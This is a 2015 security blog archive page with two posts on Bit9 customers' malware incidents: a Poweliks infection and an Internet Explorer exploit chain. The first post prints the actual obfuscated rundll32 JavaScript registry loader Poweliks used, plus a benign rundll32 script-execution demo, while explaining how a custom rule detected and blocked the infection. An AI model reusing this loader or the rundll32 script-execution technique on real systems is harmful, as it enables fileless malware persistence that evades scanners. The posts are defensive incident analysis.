The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for January, 2015

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

Posted by Xavier Ashe on January 21, 2015

This blog post I wrote for the Bit9 Blog and was published on January 21st, 2015.

ITsec

I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);

Ashe1

Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:

Ashe2

The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.

 

Posted in Bit9 | Leave a Comment »

Scan-based Forensics Solutions Are for Cavemen

Posted by Xavier Ashe on January 21, 2015

This blog post I wrote for the Bit9 Blog and was published on January 15, 2015.

caveman

I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in:

c:\windows\system32\tasks, that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file got dropped into the C:\windows\system32 directory, another file with a different name appears in the c:\windows\syswow64 folder as well. Both of the dll files appear to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because he knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Posted in Bit9, Carbon Black | 1 Comment »

 
%d bloggers like this: